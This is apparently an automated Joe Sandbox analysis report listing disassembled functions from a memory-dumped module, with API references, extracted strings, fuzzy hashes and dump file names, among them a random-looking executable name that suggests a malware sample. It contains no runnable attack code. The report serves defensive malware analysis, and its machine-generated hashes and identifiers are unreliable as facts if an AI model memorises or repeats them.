Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 9958ccfb55c0d8587cdfce39118ec998261a864dc4d301f31389958719656591
Instruction ID: 63e8591909c605fe1a2f53ae96cf41c381eda44e636fc56174dc0653bbe3869f
Opcode Fuzzy Hash: 9958ccfb55c0d8587cdfce39118ec998261a864dc4d301f31389958719656591
Instruction Fuzzy Hash: 92C1BF31E083199FDB14CFA9C85079EB7B6FF94314F184529D406ABB80D771AD89CB91

Function 6C9BD4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

, xrefs: 6C9BDA88
0, xrefs: 6C9BD852
8, xrefs: 6C9BDC08
-, xrefs: 6C9BD7DD
0, xrefs: 6C9BDC7F
1, xrefs: 6C9BDBDD
9, xrefs: 6C9BDE7F
@, xrefs: 6C9BDAF6

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: b8d35072cba16821603818f482c9746fc4b0c3a8e5024b705f4395e37815f568
Instruction ID: 29b1b452447c093473232f1114b65940f551ed49e5ded151a73800565cc8a106
Opcode Fuzzy Hash: b8d35072cba16821603818f482c9746fc4b0c3a8e5024b705f4395e37815f568
Instruction Fuzzy Hash: 2A62FE7250D345AFD701CE18C0903ABBBF6AF86318F184A4DE4E46BB99C375D985CB82

Function 6C9C9F00 Relevance: 8.5, Strings: 6, Instructions: 1039COMMON

Download Yara Rule

Strings

' , xrefs: 6C9CA3D8
@, xrefs: 6C9CA625
0, xrefs: 6C9CAB22
1, xrefs: 6C9CA824
9, xrefs: 6C9CA5D6
0, xrefs: 6C9CA100

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID: ' $0$0$1$9$@
API String ID: 0-2946122015
Opcode ID: f466f95096f12e1dc201d4778bec56598b6ac4a02278eb62bbe8c65951087d09
Instruction ID: d32a4b82511d68c38211ae404df5774c7460d09c73bd320edad65cca52c89f68
Opcode Fuzzy Hash: f466f95096f12e1dc201d4778bec56598b6ac4a02278eb62bbe8c65951087d09
Instruction Fuzzy Hash: 0282F431B093218BD710CF19C49026EB7F5FB85758F558A2AE8E547E90DB38D986CB83

Function 6C9BBEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C9BC1CB
__aulldiv.LIBCMT ref: 6C9BC24C
__aulldiv.LIBCMT ref: 6C9BC348
__aullrem.LIBCMT ref: 6C9BC365
__aulldiv.LIBCMT ref: 6C9BC37D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: a02fceb65e2d0202e2a3cd5794fab4ce21d831b52f923ea91fbc7b4b498b796f
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 03323832B046129FC718DE2CC890666BBE6AFD9310F09867DE499DB395D730DD05CB91

Function 6CA2545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CA28A4B

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 4ea5e1a757f19aa79b5f13af850809ed2b6a353804a6b44fdb7b620702f001c1
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: BFB1C672A0021A8FDB14CE68CC90799B7B2FF95314F1C02A9D549DB795D734A9C9CB90

Function 6CA2542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CA288F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CA2925C

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 10213436861f9907c5b4e319aecd43297ad3e7e09aa1ffc8ee1f91ac5c9bdc4a
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 16B1C372E0021A8BDB14CF68C9816EDB7B2EF94314F1C0269D949EB785D734A9C9CB90

Function 6CA250C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA28E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CA2925C

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 18b05f82f32e7b317e1bdb5a37f21a6472bff5d868e765609a982d7dc38003b4
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 54A1D772E002268FDB14CE68CC807D9B7B2AF95314F1D02B9C949EB785D734A9D9CB90

Function 6CA077A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA07A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA07A93

Part of subcall function 6C9D5C50: GetTickCount64.KERNEL32 ref: 6C9D5D40
Part of subcall function 6C9D5C50: EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CA07AA1

Part of subcall function 6C9D5C50: __aulldiv.LIBCMT ref: 6C9D5DB4
Part of subcall function 6C9D5C50: LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CA07B31

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 8e8a1db19f8e44a0d8ad807e0a1745701bc094029dfbb9f6f62023c01f2f76fa
Instruction ID: f17d15741293cc9799d99f599852d806edfe723720b6a19f815d8902847b7607
Opcode Fuzzy Hash: 8e8a1db19f8e44a0d8ad807e0a1745701bc094029dfbb9f6f62023c01f2f76fa
Instruction Fuzzy Hash: 95B19D317083858BCB14CE24D45065FB7E2BFC939CF194A1CE996A7791DB70E94ACB82

Function 6CA185F0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA18C7C
__aulldiv.LIBCMT ref: 6CA18DD7

Strings

temRoot%\system32\napinsp.dll, xrefs: 6CA188C1, 6CA18B71

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: __aulldiv
String ID: temRoot%\system32\napinsp.dll
API String ID: 3732870572-3119843849
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: cbb1c12e74bf4f85456be9f02387f51cfd6248a86bf19662796d72ade6c55415
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D4327131F041198BDF18CE9DC9A17EEB7B2FB88700F16853AD416BBB90D6349D858B91

Function 6C9F6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C9F6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9F6E1E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 968aaa39564177a2428bbff23fd6e08d561b8552cefd0db4905eedc5ffacb52a
Instruction ID: dc0b919e9d8b50c433623afd9bc84b69698d2e55dc17c8ab2426972509035934
Opcode Fuzzy Hash: 968aaa39564177a2428bbff23fd6e08d561b8552cefd0db4905eedc5ffacb52a
Instruction Fuzzy Hash: 1FA18D706183818FD715CF24C590BAEBBF6BF99308F04891DE49A87751DB70E849CB92

Function 6CA1B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6CA1B720
RtlNtStatusToDosError.NTDLL ref: 6CA1B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C9EFE3F,00000000,00000000,?,?,00000000,?,6C9EFE3F), ref: 6CA1B760

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 50690614f4b8987aa7d981485fbb9386f9d69b83a8afb22a012b0af5500f3c19
Instruction ID: 4989a0765626c51047e18799a748dabe16f7a622a1fcf3efca6a76986b5aa8cb
Opcode Fuzzy Hash: 50690614f4b8987aa7d981485fbb9386f9d69b83a8afb22a012b0af5500f3c19
Instruction Fuzzy Hash: 47F0C2B0A4920DAEEF019AA1DC85BEFB7BD9B0831DF145229E51161AC0D77895CCC760

Function 6C9D4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C9D4777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C9D5585, 6C9D55A8, 6C9D55C3, 6C9D5624

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: f1149b15926fb587e40666802cde5ca39d59f87bcb49356921f2c1af454f089d
Instruction ID: 9c4bc6f88296e3874930a28dcb6db1792cf325f526322c5ce149d9ecb23415e1
Opcode Fuzzy Hash: f1149b15926fb587e40666802cde5ca39d59f87bcb49356921f2c1af454f089d
Instruction Fuzzy Hash: FFB28C71A15B018FC309CF19C590715BBE6FFC5324B2AC7ADE86A9B6A5D731E841CB80

Function 6CA1B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9C03D4,?), ref: 6CA1B955
NtQueryVirtualMemory.NTDLL ref: 6CA1B9A5

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 0a77392a2598bd7166b691b34162e62102eac65cd4b9fbbc8611901860d0f51b
Instruction ID: 929eb6484fa0a8acd088d730178abe864cbf4ef78fa92597f25b34208cd0b39e
Opcode Fuzzy Hash: 0a77392a2598bd7166b691b34162e62102eac65cd4b9fbbc8611901860d0f51b
Instruction Fuzzy Hash: C141B671F0521D9FDF04CFA9E891ADEBBB5EF88354F14822AE505A7B04DB309C858B90

Function 6C9BDFE0 Relevance: 1.9, Strings: 1, Instructions: 683COMMON

Download Yara Rule

Strings

TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex, xrefs: 6C9BE3A2, 6C9BE7AC

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID: TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex
API String ID: 0-2500090351
Opcode ID: d9a91f88530ee35eb84a471fa725e770432fc5593085feebb3640a167aaf7396
Instruction ID: 727b004e35bc4eaafb27dc3a063a04cdaef2ab3e85350d9634df4455afaf7d6c
Opcode Fuzzy Hash: d9a91f88530ee35eb84a471fa725e770432fc5593085feebb3640a167aaf7396
Instruction Fuzzy Hash: E942B132A087518BD308CE3CC49075BB3E6BFC9364F198B6DE999A7791D734D9418B82

Function 6C9F5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C9C4A63,?,?), ref: 6C9F5F06

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: dc25a88dddd17a221bf7d2e3bfad9e8b68573839ddc23ab4c0f244a4a36f55ae
Instruction ID: efb438ad1f79f75c549b10e0e0254dae8a5ff0e5edd7b8e73b3af7d2a662f6ec
Opcode Fuzzy Hash: dc25a88dddd17a221bf7d2e3bfad9e8b68573839ddc23ab4c0f244a4a36f55ae
Instruction Fuzzy Hash: 52C1E375D012099FDB04CF95C5906EEBBF6FF8A318F28815DD865ABB44D732A806CB90

Function 6CA276E3 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: e8e12eee8708523c1a978861544b6a9e2e14c860ec971d0812d64be532adba17
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: FB32FA71E006298FCB14CF99C990AADF7B2FF88304F588169C949E7745D735AA86CF90

Function 6CA26E63 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: d0d50a035eaccc3793e0a21db3ca0927d03310ba43e479f659d42282e709c857
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: 5022D871E006298FCB14CF99C980AADF7B2FF88304F6885A9C549E7745D735A986CF90

Function 6C9E0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: b39985873138f1506665d842cedbf1178e46c4d3ee00f3cc49ac5675c192a556
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: F6220571E04659CFCB15CF98C890AADF7B2FF99304F548699C44AAB705D731A986CF80

Function 6CA2AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dba1471aacb16541de02cfa68b17db2ce8275ba57160f51f9aba23f1672b59b6
Instruction ID: db262b1a6d33cc2d21a0d1fd4276557cc6b614f17fe39eb0d42abdd703dc885c
Opcode Fuzzy Hash: dba1471aacb16541de02cfa68b17db2ce8275ba57160f51f9aba23f1672b59b6
Instruction Fuzzy Hash: 68F117716087654FD700CE28C8913AAB7E3AFC5318F1D8A2DE8D587781E7789CC98792

Function 6C9BC670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: f52a6825de90e43b4df4c285f6f6aa65f582f7b16e60cdf882153f360e4e1f1b
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 5FA19C71F0021A9BDB08CE69C8917AFB7F2AFC8354F188269D915F7781DB349C068B90

Function 6C9F7710 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: c43822a7864020febc2ac316aa47fa51da5f5b15654b5cd4703b13fbb8c8dd78
Instruction ID: cda9343832d0a949827cb337e523815621e20436cd544d71e57356df09a191b3
Opcode Fuzzy Hash: c43822a7864020febc2ac316aa47fa51da5f5b15654b5cd4703b13fbb8c8dd78
